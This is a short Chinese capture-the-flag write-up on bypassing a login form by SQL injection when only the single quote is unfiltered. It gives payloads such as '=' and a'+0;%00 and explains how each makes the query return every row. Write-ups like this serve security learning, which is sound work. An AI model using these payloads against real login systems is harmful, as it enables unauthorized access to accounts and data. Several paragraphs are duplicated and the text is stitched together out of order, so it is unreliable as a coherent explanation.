登陆一下好吗??
这个题过滤了绝大多数东西,然而留下了最关键的单引号。
但真只剩下单引号可用了还真搞不定,参考别人wp后学到了两种方法:
1.‘没有过滤!发现* / select union or 都被过滤了.
我们输入admin=‘=’输入password=‘=’
分析假设数据库里的句子:
$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;
我们按照上面输入就成了
$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;
先看前面user那一块,由于两个等号是从左往右计算的,user=‘p’不存在就会返回0(false),而0=''则会返回1,
所以还可输入下面'='0e121
但真只剩下单引号可用了还真搞不定,参考别人wp后学到了两种方法:
1.‘没有过滤!发现* / select union or 都被过滤了.
我们输入admin=‘=’输入password=‘=’
分析假设数据库里的句子:
$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;
我们按照上面输入就成了
$sql = “select user from flag where user=’‘=’’ and password=’‘=’‘”;
先看前面user那一块,由于两个等号是从左往右计算的,user=‘p’不存在就会返回0(false),而0=''则会返回1,
所以还可输入下面'='0e121
这样where后面计算结果就变成了1 and 1,这样最后就会把数据表中所有的数据挑出来。
最后解析成:
$sql = “select user from flag where ture and true ”;
$sql = “select user from flag where true ”;
2.利用MySQL数据类型转换特性以及特殊截断符号“%00;”:
其次,mysql的注释符号除了-- + , # ,/**/之外,还有;%00
利用这两点,构造如下payload:
username=a'+0;%00&password=
我没有试成功,估计官方更新过滤了。不过学习了。
select * from table where username=0;
select * from table where username='a'+0;
这两句均会返回库中所有元组,就是说如果一个字符类型的变量接收到一个整形变量且值为0的时候,就会返回库中所有元组(第二句'a'+0会进行强制类型转换,最后结果还是0)
其次,mysql的注释符号除了-- + , # ,/**/之外,还有;%00
利用这两点,构造如下payload:
username=a'+0;%00&password=
我没有试成功,估计官方更新过滤了。不过学习了。